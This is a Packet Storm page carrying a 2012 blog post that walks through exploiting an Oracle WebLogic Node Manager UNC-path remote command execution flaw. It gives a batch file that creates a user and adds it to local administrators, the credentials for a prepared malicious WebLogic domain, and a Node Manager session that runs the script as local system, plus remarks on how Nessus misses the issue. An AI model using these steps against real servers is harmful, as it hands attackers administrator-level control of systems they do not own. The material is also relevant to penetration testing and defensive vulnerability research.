what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Web Logic Node Manager UNC Path Remote File Execution

Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted Mar 20, 2012
Authored by Darren McDonald

This advisory documents the Oracle Web Logic Node Manager UNC path remote file execution exploitation details.

tags | exploit, remote, web
SHA-256 | daaffc0bec7c483c0d88adc5451469a0a0532e7447405434739568711c8fe617

Oracle Web Logic Node Manager UNC Path Remote File Execution

Change Mirror Download
Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted by admin on 2012/03/16 Leave a comment (0) Go to comments

Keep running into old Web Logic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.

The file traversal one is rubbish as you can’t specify any command line arguments AFAIK (Do tell me if I’m wrong, please).

The UNC one requires you have a web logic domain accessible via a UNC path. Too much of a pain in the arse to do in middle of a test. Could not find one online, so I downloaded an older version of web logic, and setup a little wl domain with a little batch file to run the following…


net user /add wlcetest WLCETest99*
net localgroup administrators /add wlcetest

The username and password for the wl domain is weblogic / w3bl0g1c.

Download it here. It’s for 10.3.2, no idea if it’ll work on other versions of WebLogic.

Here it is in action..

user@host:~$ openssl s_client -connect

+OK Node manager v10.3 started
domain cetest1 \\\share
+OK Current domain set to ‘cetest1′
execscript addlocaladmin.bat
+OK Script ‘addlocaladmin.bat’ executed

Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as local system.

Typically, Nessus doesnt pick the UNC issue up, nor does it pick up the file traversal one if the domain directory structure is sitting on a driver letter other than C:\. This is because its file traversal technique can’t find ..\..\..\..\..\..\windows\system32\ipconfig.exe on D:\ E:\ Z:\ or whatever, which is its test case.

Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    32 Files
  • 6
    Jun 6th
    39 Files
  • 7
    Jun 7th
    22 Files
  • 8
    Jun 8th
    17 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By